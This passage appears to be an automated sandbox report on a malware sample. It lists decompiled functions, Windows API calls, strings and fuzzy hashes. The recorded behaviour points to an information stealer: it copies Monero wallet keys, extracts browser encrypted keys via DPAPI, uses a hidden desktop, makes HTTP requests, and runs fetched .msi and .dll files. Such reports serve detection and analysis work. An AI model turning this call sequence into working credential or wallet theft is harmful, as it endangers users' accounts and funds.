                                              • Part of subcall function 0246AE97: lstrcpy.KERNEL32(00000000,?), ref: 0246AEE9
                                              • Part of subcall function 0246AE97: lstrcat.KERNEL32(00000000), ref: 0246AEF9
                                              • Part of subcall function 0246AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0246AE7C
                                              • Part of subcall function 0246AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0246AF3C
                                              • Part of subcall function 0246AF27: lstrcpy.KERNEL32(00000000), ref: 0246AF7B
                                              • Part of subcall function 0246AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0246AF89
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 0245CDD3
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0245CDF0
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0245CDFC
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0245CE0F
                                            • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0245CE1C
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0245CE40
                                            • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 0245CE5E
                                            • StrStrA.SHLWAPI(00000000,006D6D64), ref: 0245CE85
                                            • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 0245D009
                                            • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 0245D020
                                              • Part of subcall function 0245CB87: memset.MSVCRT ref: 0245CBBA
                                              • Part of subcall function 0245CB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0245CBD8
                                              • Part of subcall function 0245CB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0245CBE3
                                              • Part of subcall function 0245CB87: memcpy.MSVCRT(?,?,?), ref: 0245CC79
                                            • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 0245D0C1
                                            • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 0245D0D8
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B47), ref: 0245CCAA
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B4B), ref: 0245CCBE
                                              • Part of subcall function 0245CB87: lstrcat.KERNEL32(?,00420B4E), ref: 0245CCDF
                                            • lstrlen.KERNEL32(00000000), ref: 0245D1AB
                                            • CloseHandle.KERNEL32(00000000), ref: 0245D203
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 1564132460-3916222277
                                            • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction ID: e8ebadba69ed8eeeae8470a67bf846b2633352bbbbbe28877c680f4f67554879
                                            • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                            • Instruction Fuzzy Hash: C0E1FD71940528ABCB19EBE5DC98EFEB77AAF58300F40415EF146B6190EF306A49CF52
                                            Function 0245A097 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0245A0AE
                                              • Part of subcall function 02468F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,02451660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02468F7D
                                            • wsprintfA.USER32 ref: 0245A0E6
                                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0245A10A
                                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0245A133
                                            • memset.MSVCRT ref: 0245A154
                                            • lstrcat.KERNEL32(00000000,?), ref: 0245A16A
                                            • lstrcat.KERNEL32(00000000,?), ref: 0245A17E
                                            • lstrcat.KERNEL32(00000000,004212D8), ref: 0245A190
                                            • memset.MSVCRT ref: 0245A1A4
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0245A1E3
                                            • memset.MSVCRT ref: 0245A203
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0245A26B
                                            • Sleep.KERNEL32(00001388), ref: 0245A27A
                                            • CloseDesktop.USER32(00000000), ref: 0245A2C7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                            • String ID: D
                                            • API String ID: 1347862506-2746444292
                                            • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                            • Instruction ID: ddde458db509fa4dae7f053a195c0891e23f7e119e901a7725825684021af676
                                            • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                            • Instruction Fuzzy Hash: D4517FB1904318ABDB24DB61CC89FE97779AF48700F004599F60DAA2D0EBB59B88CF55
                                            Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • RegOpenKeyExA.ADVAPI32(00000000,009CE348,00000000,00020019,00000000,004205BE), ref: 00418534
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                            • String ID: - $%s\%s$?
                                            • API String ID: 3246050789-3278919252
                                            • Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                            • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                            • Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                            • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                            Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID: `dAF$`dAF$image/jpeg
                                            • API String ID: 2244384528-2462684518
                                            • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                            • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                            • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                            • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                            Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                            • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                            • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                            • strtok.MSVCRT(00000000,?), ref: 004155EE
                                            • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                            • API String ID: 3532888709-2643084821
                                            • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                            • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                            • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                            • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                            Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strtok_s.MSVCRT ref: 00411557
                                            • strtok_s.MSVCRT ref: 004119A0
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                            • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                            • Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                            • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                            Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell$lstrcpy
                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                            • API String ID: 2507796910-3625054190
                                            • Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                            • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                            • Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                            • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                            Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004144EE
                                            • memset.MSVCRT ref: 00414505
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                            • lstrcatA.KERNEL32(?,009D0750), ref: 0041455B
                                            • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                            • lstrcatA.KERNEL32(?,009D0510), ref: 00414583
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                            • StrStrA.SHLWAPI(?,009D0708), ref: 00414643
                                            • GlobalFree.KERNEL32(?), ref: 00414762
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                            • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                            • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                            • Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                            • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                            Function 02464737 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 02464755
                                            • memset.MSVCRT ref: 0246476C
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 024647A3
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 024647C2
                                            • lstrcat.KERNEL32(?,?), ref: 024647D6
                                            • lstrcat.KERNEL32(?,006D6FD8), ref: 024647EA
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02469187: GetFileAttributesA.KERNEL32(00000000,?,02451DFB,?,?,00425784,?,?,00420E22), ref: 02469196
                                              • Part of subcall function 0245A697: StrStrA.SHLWAPI(00000000,00421360), ref: 0245A6F0
                                              • Part of subcall function 0245A697: memcmp.MSVCRT(?,00421244,00000005), ref: 0245A749
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                              • Part of subcall function 024697B7: GlobalAlloc.KERNEL32(00000000,02464894,02464894), ref: 024697CA
                                            • StrStrA.SHLWAPI(?,006D6AD8), ref: 024648AA
                                            • GlobalFree.KERNEL32(?), ref: 024649C9
                                              • Part of subcall function 0245A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4A6
                                              • Part of subcall function 0245A477: LocalAlloc.KERNEL32(00000040,?,?,?,024551A5,00000000,?), ref: 0245A4B8
                                              • Part of subcall function 0245A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4E1
                                              • Part of subcall function 0245A477: LocalFree.KERNEL32(?,?,?,?,024551A5,00000000,?), ref: 0245A4F6
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246495A
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 02464977
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 02464989
                                            • lstrcat.KERNEL32(00000000,?), ref: 0246499C
                                            • lstrcat.KERNEL32(00000000,00420FA0), ref: 024649AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction ID: 317909ef4ff12c80718752a33e9ff83473c145114552e4e5c71ac29af9629149
                                            • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction Fuzzy Hash: D27145B1D00218ABDB14EBB1DC49FEE777AAF48300F04459EE605A6190EB75DB48CF51
                                            Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00401327
                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                            • memset.MSVCRT ref: 00401516
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                            • API String ID: 1930502592-218353709
                                            • Opcode ID: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                            • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                            • Opcode Fuzzy Hash: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                            • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                            Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
